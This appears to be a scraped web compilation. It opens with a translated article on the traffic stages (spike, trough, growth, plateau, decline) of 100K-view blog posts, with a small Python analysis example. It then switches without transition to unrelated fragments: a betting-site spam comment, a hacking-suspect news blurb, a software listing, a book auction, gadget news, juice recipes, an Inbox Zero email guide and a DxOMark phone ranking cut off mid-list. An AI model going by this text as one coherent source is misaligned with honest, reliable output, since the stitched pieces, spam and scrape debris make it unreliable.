Editor's note: reaching 100,000 views is considered the mark of a successful article. But what do 100K+ articles have in common? Data analyst Andrew Tate used Google Analytics to study the traffic composition and trajectory of 100K+ articles and distilled a template for success. Of course, those shapes are only the results of success; what matters is still the headline, the content and the promotion.

All successful content marketing follows the same pattern.

At least, that is our intuition, and we wanted to confirm it. We have seen plenty of articles take off and still bring steady organic traffic months or even years later. We have also watched plenty of articles fail, their traffic flatlining a day or two after publication.

Blog posts tend to follow a few similar "shapes": the data points in Google Analytics tell the story of a post. You do not need to know much about keyword volume or traffic sources to read those shapes. You may even be able to say within weeks of publication whether a post will take off or fizzle. But all of that is untested guesswork. We wanted to find indicative patterns, and more importantly predictive ones, so we looked closely at a number of posts with more than 100,000 page views to see whether our observations held up in the data.

The result is a template for success, but also a new, more scientific way of thinking about how to measure your content.

The five stages of the content life cycle

Thinking of content as either viral or evergreen is limiting. To succeed, a post ideally needs both short-term appeal and long-term engagement (likes, shares, comments, downloads and so on). Its shape in Google Analytics gives this away. You have probably seen plenty of posts whose traffic soars at first and then falls off a cliff.

We used 100,000 lifetime page views as the benchmark for a successful post, though that is of course not the only way to define success. Still, posts that make it into the 100K+ club have clearly delivered a lot of value.

Most members of this club have a very similar shape. Here is one example:

Example #1: a native success

AdEspresso, "We Analyzed 752,626 Facebook Ads, and Here's What We Learned"

This post, like other equally successful ones, went through five distinct stages:

  1. Spike, when the post is first published.

  2. Trough, when growth appears to have stalled.

  3. Growth, when page views climb over several months.

  4. Plateau, when growth levels off.

  5. Decline, when traffic eventually falls away (described further below).

The initial spike makes the long tail look insignificant, yet most of this post's page views came in that tail. (AdEspresso has 13 posts in the 100K+ club, which is impressive.)

Here is another 100K+ example with the same growth shape, from Appcues. The initial spike is less pronounced, so the growth period is easier to see:

Example #2: a long-tail success

Appcues, "The 5 Best User Onboarding Examples"

Let's look at example #2 more closely. Breaking the traffic down by source shows what drove page views in each stage:

The initial spike was driven by community links (orange) from GrowthHackers, Inbound, Designer News, Reddit and Hacker News, with some traffic from email (green) and direct visits (red). A second bump a few weeks later came from email and social media (cyan), the result of a second round of promotion on those channels.

Overall traffic then ran flat for a few weeks. The gap between the second, email-driven spike and the start of the growth period was more than three months. During that time total traffic grew by about 100 views a week. The post looked as if it had run its course.

Then the post entered the next stage, growth. Growth came slowly, from organic search traffic. For this post, organic traffic started to show up after the 25-week mark, and from that point organic search became a significant share of all traffic.

For roughly the first six months the post drew its traffic mostly from direct visits, email and referrals. In the second half of the year organic traffic took over, going from a small fraction of traffic to the vast majority of it.

We see something similar in the trough (roughly weeks 12 to 25), where organic traffic was still only a small part of the total. The headline numbers had essentially flattened, but organic traffic was already beginning to overtake the fading direct, email, community and social traffic to become the dominant source.

At the peak, organic traffic accounted for 7.4% of this post's traffic. What decides growth is not the absolute number but the ratio of organic to other traffic.

By the one-year mark the post had moved into the fourth stage, the plateau. By then it ranked first for its target keyword and took the largest share of searches for it. It held that ranking for more than a year before traffic began to decline.

Looking at the share of traffic across this post's stages, we see:

About 97% of the traffic accumulated after the initial spike. Even more remarkably, 90% of it arrived after the post had been live for six months.

The fifth stage, decline, is also visible for this post. It happens when newer content displaces the post and starts to eat into its organic traffic, pulling total traffic down, or when search volume for the target keyword falls.

Here are two more examples of the same shape, also 100K+ posts. The first was published in 2015:

Example #3: a slow decline

Wistia, "Recording Audio with the Canon 5D Mark III"

The initial spike, the growth period and the plateau are all visible. In this case the post has been declining slowly for the past two years, though it still brings the blog a respectable 200 or so views a week. Given its lasting value, the post is ripe for a content refresh: updating the headline and parts of the body would stop or reverse the decline.

Here is another example, published in 2014:

Example #4: sustained growth

I Done This, "The Science Behind Bezos's Two-Pizza Team Rule"

The I Done This post does not seem to have suffered a decline even four years on. In fact its gradual growth has continued.

So why does the Wistia post decline while this one keeps rising? The difference is the topic. The first (the one in long decline) is about hardware, which has a shelf life. The second (with the long growth phase) covers something genuinely timeless.

What can we take from this?

  • Distribution matters. Almost every successful post we looked at went through a strong spike. That initial traffic plants the organic seed: people have to see your post before they can link to it. Search algorithms also collect data on how people interact with your new post (dwell time, bounce rate and other ranking signals). Getting the post out on Reddit, Twitter and above all your email list is important for awareness, and that awareness brings the links that later drive organic traffic.

  • Growth comes from search. But if you are hoping for a splash on Hacker News with no plan for day two onwards, the post will be a flash in the pan at best and your blog will not grow. Past a certain point the initial spike no longer seems to add to the size or speed of later traffic; sustained success depends far more on on-page optimisation, content quality and evergreen topics.

  • Volume sets the size of your blog. The ceiling for organic traffic is easy to measure: if you rank at the top for every target keyword, your traffic will be at the top too. Choose a mix of keywords that drive both traffic and conversions (middle and bottom of the funnel). Each brings its own value.

  • Decline is inevitable. In almost every case. Evergreen content can keep growing for years, but other sites will try to push you out of the top results. Holding the top spot today does not mean you will hold it next year without effort.

One final note: this takes time. The successful posts above accumulated their traffic over years. The initial spike is unlikely to produce 100K+ views, and organic traffic cannot reach 100K+ overnight either. Building both takes time, but you can tell early whether you are heading in the right direction.

Will your post take off? What to look for

It is easy to judge a post's success or failure a year or two after publication, but can you tell early whether a post will gain traction in search?

The question comes down to whether you reach stage three, growth. If the organic growth slope appears within six months, the post is a success. If there is no upturn during the trough, there will be no growth.

Here is an example from Amplitude. Published in 2016, the post has not reached 100K+ yet but is clearly on its way:

Example #5: success is inevitable

Amplitude, "The 3 Mistakes You Are Making with Month-over-Month Growth Rates"

This post reached stage three much earlier than example #1 (AdEspresso) or #2 (Appcues). The initial spike came through email, but within three months the post had grown into organic search traffic. Stage two was almost non-existent.

Looking at each channel's contribution, organic accounted for over 90% within six months. That is the key to success: the sooner organic traffic takes the lead, the sooner significant (and passive) traffic growth follows. You can shorten the trough by investing time in promotion and link building after the spike. Refreshing the content and optimising on-page SEO also improve the odds.

The post's views keep growing. It has not plateaued yet. At roughly 75,000 views, 100K+ is within reach.

Not every post has to reach 100K+ to count as a success. The total views a post can reach depend on the search volume for its target keyword. A niche post can succeed within its own limits. Here is a post from Clearbit that may never reach 100K+ but still counts as a success:

Example #6: a smaller organic win

Clearbit, "The Modern Guide to Opportunity Selection"

The spike here was driven mainly by direct traffic, which then fell away and was replaced by organic search. The growth slope is gentler but still clear, and it started within six months. After a year the growth appears to have stabilised.

The same trend shows in this ProfitWell post, though its growth period lasts longer:

Example #7: search volume creates the ceiling

ProfitWell, "How SaaS Revenue Recognition Works"

Traffic to a post like this is limited by the narrowness of its topic. But, and this is an important but, the post speaks directly to the buyer persona for one of their products. The people who find and read it through search are exactly the people the company wants to reach.

Of course, this does not always work. Often it does not. Here is an example from a successful company's successful blog that never reached the growth stage. The trough became a flat line:

48% of this post's traffic came on day one. To date only 7.2% has come from search. This is extremely common; the 100K+ club posts above are the outliers. If you want to know whether a post will bring real traffic days or weeks after publication, look for the following:

  1. A small initial spike. If you do not see good traffic in the first week it is not the end, but it does mean backlinks are not coming. The spike means people have noticed your content, and that is the important first step.

  2. Week-on-week organic growth. Especially in the first six months, you should see steady weekly growth in the post's traffic. It means the post has found its footing, and the momentum creates a flywheel: the more people see the post, the more chances they have to link to and share it, which improves the ranking and exposes it to more people.

  3. Outsized returns from long-term traffic. Tom Tunguz says that posts on tomtunguz.com usually get only a third of their total views on day one. We found the same. For the posts above, less than 10% of the traffic came in the first week; about 90% of a successful post's traffic arrives afterwards.

This is instructive. Your mileage will of course vary, but by analysing Google Analytics through the lens of these five stages you can understand what traffic "success" looks like and learn what works for your readers.
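The five-stage reading of a traffic series, and the "organic climbing within six months" signal, as an added Python example (not from the original article or its author). It labels each week of a page-view series as spike, trough, growth, plateau or decline from a smoothed week-over-week trend, and checks whether organic search views start climbing inside the first 26 weeks. The thresholds, the four-week smoothing window and the two sample series are assumptions made for this example, not figures from the article.

```python
"""Added example, not part of the original article: stage labels for a
weekly page-view series and the article's early-success check.
Thresholds, window and sample data are assumptions for illustration."""
from statistics import mean

# Constructed 52-week series, not real analytics data: a launch spike, a
# flat trough, organic search picking up around week 20, total traffic
# following from week 26, and a plateau from week 41.
TOTAL_VIEWS = ([5000, 1500, 600, 400] + [300] * 22
               + [300 + 60 * i for i in range(1, 16)] + [1200] * 11)
ORGANIC_VIEWS = ([50, 40, 30, 30] + [30] * 16
                 + [30 + 15 * i for i in range(1, 7)]
                 + [120 + 60 * i for i in range(1, 16)] + [1020] * 11)


def organic_share(total, organic):
    """Fraction of each week's views that came from organic search."""
    return [o / t if t else 0.0 for t, o in zip(total, organic)]


def trend(series, week, window=4):
    """Relative change of the trailing `window` weeks over the `window`
    weeks before them; 0.0 until enough history exists."""
    if week + 1 < 2 * window:
        return 0.0
    recent = mean(series[week + 1 - window:week + 1])
    before = mean(series[week + 1 - 2 * window:week + 1 - window])
    return (recent - before) / before if before else 0.0


def label_stages(total, window=4, up=0.10, down=-0.10, spike_factor=3.0):
    """One stage label per week. A launch week is a spike when it is
    `spike_factor` times the post-launch baseline; afterwards the label
    follows the smoothed trend, and a fall only counts as decline once the
    post has already been through a growth stage."""
    if len(total) >= 2 * window:
        baseline = mean(total[window:2 * window])
    else:
        baseline = mean(total)
    labels, seen_growth = [], False
    for week, views in enumerate(total):
        if week < window and views >= spike_factor * baseline:
            labels.append("spike")
            continue
        t = trend(total, week, window)
        if t >= up:
            seen_growth = True
            labels.append("growth")
        elif t <= down:
            labels.append("decline" if seen_growth else "trough")
        else:
            labels.append("plateau" if seen_growth else "trough")
    return labels


def on_track(organic, window=4, horizon=26, up=0.10):
    """The article's early signal: organic views climbing week over week
    somewhere inside the first six months (26 weeks)."""
    return any(trend(organic, w, window) >= up
               for w in range(2 * window - 1, min(horizon, len(organic))))


if __name__ == "__main__":
    stages = label_stages(TOTAL_VIEWS)
    shares = organic_share(TOTAL_VIEWS, ORGANIC_VIEWS)
    for week in (0, 10, 30, 50):
        print("week %2d: %5d views, %3.0f%% organic, %s"
              % (week, TOTAL_VIEWS[week], 100 * shares[week], stages[week]))
    print("on track:", on_track(ORGANIC_VIEWS))
```

Note the contrast the sample data is built to show: total views are flat through week 25, so total traffic alone says the post has stalled, while the organic series is already climbing from week 20, which is the signal the article tells you to watch for.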

The compound effect of content marketing

Successful posts build traffic through good initial distribution and steady organic growth. Successful blogs are built by linking successful posts to one another.

The first post discussed here is only one of many 100K+ posts on the AdEspresso blog. Stacking the top performers together shows how organic growth drives the blog's overall traffic:

That is only the top 10 posts by traffic, which reach 20,000 weekly views. AdEspresso has published thousands of posts. The blog's total traffic looks like this:

Their weekly traffic is close to 150,000, achieved purely through the compound effect of content marketing: one post linking to another, and so on. As long as you regularly reach the growth stage, you can build a very large blog.

Blogs even have emergent properties: the whole is greater than the sum of its parts. The better individual posts perform, the more search engines treat your blog as a first-class resource and rank you higher.

But that success is built on individual posts, and those posts have to perform. Once you know the signs of success, you can dig into which factors in initial and long-term distribution work for your readers and which do not, repeat that success, and build a good blog one good post at a time.

Original article: https://www.animalz.co/blog/the-shape-of-content/

Produced by the translation team. Editor: Hao Pengcheng.



Reply to "Hindustani youth give meaning to 145 years of Hindustani immigration" by melhor site apostas desportivas
Hey there! I know this is kinda off topic but I was wondering which blog platform are you using for this website? I'm getting sick and tired of Wordpress because I've had issues with hackers and I'm looking at options for another platform. It would be great if you could point me in the direction of a good platform.
US court sends Nikulin for psychiatric evaluation; according to his lawyer he is apathetic - Aktuálně.cz

The Czech Republic extradited Yevgeniy Nikulin to the United States on suspicion that he is behind the hacker attacks on the social network LinkedIn and the file-storage service Dropbox. San Francisco - The Russian Yevgeniy Nikulin, whom the Czech Republic extradited to the USA this spring because of ...



SoftPerfect NetWorx 6.2.3 Multilingual Portable

SoftPerfect NetWorx 6.2.3 Multilingual Portable | 29.3 MB
NetWorx is a simple, yet versatile and powerful tool that helps you objectively evaluate your bandwidth consumption situation. You can use it to collect bandwidth usage data and measure the speed of your Internet or any other network connections. NetWorx can help you identify possible sources of network problems, ensure that you do not exceed the bandwidth limits specified by your ISP, or track down suspicious network activity characteristic of Trojan horses and hacker attacks.


William Makepeace Thackeray: The History of Pendennis I-II (*89) - Current price: 400 Ft
William Makepeace Thackeray: The History of Pendennis, His Fortunes and Misfortunes, His Friends and His Greatest Enemy. Vols. I-II.
Ordered books can be collected from the second working day after the order at Könyvgyorsan's Budapest second-hand bookshop during opening hours, or we deliver them to you under the conditions detailed under the Shipping and warranty tab.
William Makepeace Thackeray: The History of Pendennis I-II (*89)
Current price: 400 Ft
Auction ends: 2018-10-10 13:15
Xiaomi unveils the Mi Box S TV box running Android TV

The Mi Box S is the international version of the Mi Box 4 already available in China, with some improvements. In particular, there is a new remote control with dedicated buttons for calling the Google Assistant, quick access to Netflix and launching live TV.

[Image: Mi Box S]

In addition, the Mi Box S has Google Chromecast functionality, so you can use voice commands and cast video from a smartphone, tablet or PC connected over Wi-Fi.

The heart of the box is a quad-core Amlogic S905X processor with a Mali-450 GPU. It has 2 GB of RAM and 8 GB of storage, and supports Wi-Fi 802.11 a/b/g/n/ac (2.4/5 GHz) and Bluetooth 4.2. Ports: HDMI 2.0, a 3.5 mm audio output and USB 2.0.

[Image: Mi Box S ports]

The box outputs 4K HDR video at 60 frames per second and supports the DTS and Dolby Digital Plus audio technologies. It runs Android TV (version 8.1 Oreo).

[Image: Mi Box S menu]

In the US the Mi Box S is already available for pre-order. Sales start on 19 October. The price is 60 dollars.


9 fresh juices to perk you up this autumn

When better than autumn to experiment with new flavours? It is the most vitamin-rich time of the year. Here are bright fresh juices that will give you energy, help you cope with hunger during the day, speed up your metabolism and improve digestion.

How to drink fresh juices properly

  • Drink fresh juice blends within half an hour of making them to get all the nutrients.
  • Dilute fresh juices with water if you have gastrointestinal problems.
  • Drink through a straw, or rinse your mouth afterwards, to reduce the damage to tooth enamel.

How to improve what is already tasty

  • You can add spices and honey to fresh juices, but go easy on sugar and salt: they stimulate the appetite.
  • A teaspoon of light cream added to vegetable juices (but not acidic ones, or the cream will curdle) helps vitamins A, K, D and E to be absorbed.
  • For the same purpose, a little olive oil can be added to juices made from vegetables rich in carotenoids: pumpkin, carrot, sorrel, tomatoes, red pepper.

1. Grapefruit juice with apple and cinnamon

[Image: grapefruit juice with apple and cinnamon]

Ingredients:

  • 1 grapefruit;
  • 1 sweet apple;
  • 1 pinch of cinnamon;
  • 100 ml water;
  • pomegranate seeds.

Preparation

Peel the grapefruit and apple and run them through a juicer. Add the cinnamon and water to the juice; ice is optional. Garnish with pomegranate seeds and mint.

2. Pumpkin juice with celery

[Image: pumpkin juice with celery]

Ingredients:

  • 300 g pumpkin;
  • 1 apple;
  • 1 small carrot;
  • celery leaves to taste.

Preparation

Peel the pumpkin, apple and carrot and run them through a juicer. Add celery if you like. All of these ingredients can also be mixed in a blender to get a smoothie consistency and keep even more of the nutrients.

3. Orange juice with pineapple and ginger

[Image: orange juice with pineapple and ginger]

Ingredients:

  • 150 g pineapple;
  • 1 small orange;
  • 1 small piece of ginger root, to taste.

Preparation

Peel the fruit and ginger and run them through a juicer. Optionally add ice and garnish with mint or chopped nuts.

4. Tangerine juice with lime and grapefruit

[Image: tangerine juice with lime and grapefruit]

Ingredients:

  • 3 small tangerines;
  • ½ grapefruit;
  • 1 lime.

Preparation

Peel the tangerines and grapefruit, remove the seeds and run the fruit through a juicer. A few cloves and some vanilla can be added to taste.

5. Pear juice with banana and orange

[Image: pear juice with banana and orange]

Ingredients:

  • 2 small pears;
  • 1 orange;
  • ½ banana.

Preparation

Peel the pears and orange, remove the seeds and run them through a juicer. Mash the banana with a fork or blend it, add it to the juice and stir.

6. Spinach juice with apple and carrot

[Image: spinach juice with apple and carrot]

Ingredients:

  • 1 bunch of spinach (leaves only);
  • 1 green apple;
  • 1 small carrot;
  • 1 tablespoon lemon juice;
  • water and sugar to taste.

Preparation

Peel the vegetables and run them through a juicer together with the spinach, or use a blender for a thicker consistency. Add lemon juice and sugar to taste and dilute 50/50 with water.

7. Melon juice with apple and honey

[Image: melon juice with apple and honey]

Ingredients:

  • 150 g melon;
  • 1 apple;
  • 1 teaspoon honey.

Preparation

Peel and seed the melon and apple and run them through a juicer. Let the juice stand for a few minutes, add the honey and stir.

8. Vegetable juice with pepper and cucumber

[Image: vegetable juice with pepper and cucumber]

Ingredients:

  • 1 small sweet pepper;
  • 1 tomato;
  • 1 cucumber;
  • ½ teaspoon olive oil;
  • 1 teaspoon lemon juice;
  • salt to taste.

Preparation

Seed the pepper, peel the cucumber and run all the vegetables through a juicer. Add the olive oil and salt to taste and stir.

9. Mango juice with lime and pineapple

[Image: mango juice with lime and pineapple]

Ingredients:

  • 1 mango;
  • 200 g pineapple;
  • ½ lime.

Preparation

Peel the fruit, run it through a juicer, let the juice stand for a few minutes and add ice.


          Marshall представила беспроводные наушники, которые держат заряд 12 часов      Cache   Translate Page      

Marshall has announced the Minor II Bluetooth wireless earphones. They have 14.5 mm drivers and an unusual earbud design: the connecting cable passes through each earbud, forming an adjustable loop that holds the bud more firmly in the ear.

The connecting cable carries a control pod with a miniature joystick for pausing music, taking calls from the smartphone and adjusting the volume. Playback can also be stopped simply by snapping the earbuds together: they contain magnets for this purpose.

The earphones have a Bluetooth 5.0 module and support the Qualcomm aptX codec, which improves wireless sound quality. The built-in battery lasts for 12 hours of use. There is also fast charging: 20 minutes on the charger gives two hours of listening.

The Marshall Minor II Bluetooth will be available in black, white and brown for 129 euros.


The Inbox Zero method is the best way to deal with thousands of unread emails

A pile of unread messages sitting permanently in your Inbox will make anyone panic. If you have many business partners and colleagues you deal with by email, you simply have to keep your mailbox clean and tidy.

JotForm CEO Aytekin Tank suggests an interesting way of organising email called Inbox Zero. As the name implies, the method consists of simply keeping your Inbox empty.

Tank did not actually invent anything new. Inbox Zero was created long ago by writer and blogger Merlin Mann, and it is a proven and widely known method. David Allen described roughly the same technique for handling paperwork in his book Getting Things Done. Tank has simply adapted it to the Gmail web interface.

I receive and send hundreds of emails every day. But at the end of the working day my inbox is invariably empty. I don't have a secretary to handle my correspondence. I follow a principle called Inbox Zero. There is nothing complicated about it.

Aytekin Tank, entrepreneur, founder and CEO of JotForm

Tank lists the advantages of the Inbox Zero method:

  • You won't miss an important message if your Inbox is empty.
  • You won't keep your correspondents waiting, because you'll be able to reply to their emails immediately.
  • Hundreds and thousands of unread messages won't pile up in your mailbox.
  • You'll save more time for genuinely important tasks instead of spending hours fiddling with email.

I know many people who carefully keep all their emails without deleting a single one. As a result their mailbox starts to look like a Twitter feed. That's inconvenient. You will constantly get lost among the messages.

Aytekin Tank

Let's assume you use Gmail, although the method can be adapted to any provider (Hotmail, Yandex, Yahoo) or mail client (Outlook, Thunderbird or Sylpheed). Let's survey the backlog of unread messages and get started.

1. Empty your mailbox

So, having adopted the Inbox Zero method, you must act decisively. Open your Inbox, select all the messages that have piled up there and archive them all at once. To some this will seem like sheer madness, but that is exactly what Tank recommends.

You need to start with an empty mailbox. This guide won't help you if tens of thousands of messages have accumulated in your Inbox. So archive everything and let's start with a clean slate.

Aytekin Tank

2. Process your mail in chronological order

Developing this useful habit takes a certain discipline. When you process your mail, start with the oldest message and work towards the newest. That way you keep the chronological order and don't get confused.

Two Gmail features will help you process mail:

Enable Auto-advance. To do this, open Settings → General, find the Auto-advance item and turn it on. Now, after you reply to or archive a message, Gmail will show you the next message instead of returning you to the inbox list. This way you can process messages one after another in the order they arrived, without distractions.

Then enable the Send & Archive button if it isn't already on. Open Settings → General and find the item "Show 'Send & Archive' button in reply". This saves time. After all, once you have replied to a message there is no point keeping it in your Inbox, is there? Click send and the message is moved to the archive automatically.

And one more important thing:

Don't use email as a chat. There is nothing worse than spawning endless Reply chains of messages quoting each other. If you need to talk, use a messenger, a Slack chat, or pick up the phone. Email isn't designed for that.

Aytekin Tank

3. Replied? Archive it

The main rule of the Inbox Zero method: your Inbox is not a place to store mail. Every email in your mailbox should be dealt with immediately. Read them one by one and either reply and archive, if the message needs a reply, or just archive, if it doesn't.

If you can't reply to a message right away, there are two options:

  • Save it in your organiser app. That could be Evernote, OneNote or some task manager. Set a date so the program reminds you to write the reply at the right moment.
  • If you can write the reply now but the recipient should receive it later, use Gmail's delayed delivery feature. Outlook, Thunderbird and other clients can do the same.

4. Just do it

All according to the precepts of the great David Allen. If an email calls for an action that takes a few minutes, just do it right now. Don't copy the email into a to-do list. Don't leave it in your Inbox.

If you need to make a payment, just make it right now. If you need to send feedback to a colleague, send it immediately. If a task takes a couple of minutes, there's no point putting it off.

Aytekin Tank

5. Use keyboard shortcuts

Keyboard shortcuts significantly cut the time spent processing email. With them you won't have to drag the mouse cursor back and forth. Tank recommends memorising and using three hotkeys:

  • The E key archives a message quickly. Read it, press E, archived. Simple.
  • The R key is used to write a quick reply. If a message needs a reply, press it, type the reply, press Enter.
  • The F key forwards received messages to other recipients.

I don't think you'll need any other hotkeys. In Gmail I use only three shortcuts. For everything else there's the mouse. But the hotkeys listed let you quickly perform the three most common email actions, so they save a lot of time.

Aytekin Tank

6. Set up filters

Email filters are an incredibly handy tool that does a lot of the work for you. Set them up once and they will save you plenty of time.

If you regularly find unimportant mail in your Inbox (notifications from online services, automated mailings and so on), either unsubscribe from them or set up filters so that such messages are archived automatically.

7. Inbox empty? Close your mail

When you are trying to concentrate on work, you can't keep getting distracted by email. So stick to the rule: when your Inbox is empty, close the Gmail tab or mail client and forget about mail for the next few hours. Just get on with your work.

Turn off all notifications about incoming email. They are very distracting.

You can open your mail again in a few hours, process the messages that have accumulated, and then get back to work. The aim of the Inbox Zero method is to force yourself not to be distracted by incoming mail. You should control your mailbox, not the other way round.

Aytekin Tank

If you have tried the Inbox Zero technique and want to tell us how it went, or want to suggest a better method, let us know in the comments.

The 10 smartphones with the best cameras according to DxOMark

1. Huawei P20 Pro

  • DxOMark score: 109 points.
  • Triple camera:
    • 40-megapixel RGB sensor, f/1.8 lens, 27 mm focal length;
    • 20-megapixel monochrome sensor, f/1.6 lens, 27 mm focal length;
    • 8-megapixel RGB sensor, f/2.4 telephoto lens, 80 mm focal length, with optical stabilisation.
  • Phase-detection autofocus in the 40 MP sensor.
  • 4K video recording mode.
  • Slow-motion recording at 960 frames per second at 720p.
  • Front camera: 24 MP.

The smartphone offers 3x optical and 5x hybrid zoom. It can shoot at ISO up to 102400 and in Super Slow-Mo. There is an intelligent optical stabilisation system and advanced autofocus.

The cameras deliver sharp shots in any lighting.

The Huawei P20 Pro's internals don't disappoint either. This is a fully fledged flagship.


2. iPhone XS Max

  • DxOMark score: 105 points.
  • Main module: 12 MP, six-element f/1.8 lens, 26 mm equivalent focal length.
  • Secondary module: 12 MP, six-element f/2.4 lens, 52 mm equivalent focal length.
  • Optical image stabilisation.
  • Autofocus (PDAF).
  • Dual Quad-LED flash.
  • 4K video at 30/60 frames per second, 1080p video at up to 240 frames per second.
  • Front camera: 7 MP.

Overall the camera specifications of the iPhone XS Max are identical to last year's iPhone X. On closer inspection, however, some important improvements can be found. For example, the 12-megapixel sensor in the wide-angle module of the dual camera is now larger than on the iPhone X (1.4 µm versus 1.22 µm).

However, the new iPhone received far more changes in its image-processing software. When shooting a photo, the iPhone XS Max continuously captures a multi-frame buffer at different exposure levels, which gives zero shutter lag and real-time HDR processing.

This means the iPhone XS Max can display HDR images directly in the preview, so in the viewfinder you see shots exactly as they will be saved. So far none of the iPhone's competitors can do this.


3. HTC U12+

  • DxOMark score: 103 points.
  • Main module: 12 MP, f/1.75 lens.
  • Secondary module: 16 MP, f/2.6 telephoto lens.
  • Phase detection and laser-assisted autofocus.
  • Optical image stabilisation.
  • Dual LED flash.
  • 4K video at 60 frames per second.
  • Front camera: dual 8 + 8 MP.

The HTC U12+ flagship has top-end image-processing features. The smartphone supports shooting photos in RAW format. HTC's proprietary UltraSpeed Autofocus 2 system provides phase detection and laser-assisted autofocus.

A bokeh simulation mode for artificial background blur in portrait shots is also supported. The front panel houses a dual-tone LED flash.


4. Samsung Galaxy Note 9

  • DxOMark score: 103 points.
  • Main module: 12 MP, 1/2.55-inch sensor, dual-element PDAF, variable-aperture f/1.5–2.4 lens.
  • Secondary module: 12 MP, f/2.4 lens, 1/3-inch sensor, AF.
  • Optical stabilisation on both cameras.
  • LED flash.
  • 4K video at 30/60 frames per second.
  • Front camera: 8 MP.

Samsung paid plenty of attention to the camera of its new creation. The Note 9 has a dual camera: a main wide-angle module and a secondary telephoto module. Both modules have optical stabilisation.

The Note 9's main feature is artificial-intelligence support for improving shot quality, for which Samsung modestly calls the Note 9's camera the most intelligent camera of all. Thanks to AI, the system can identify key objects in the image and optimise shooting parameters and photo processing.


5. Huawei P20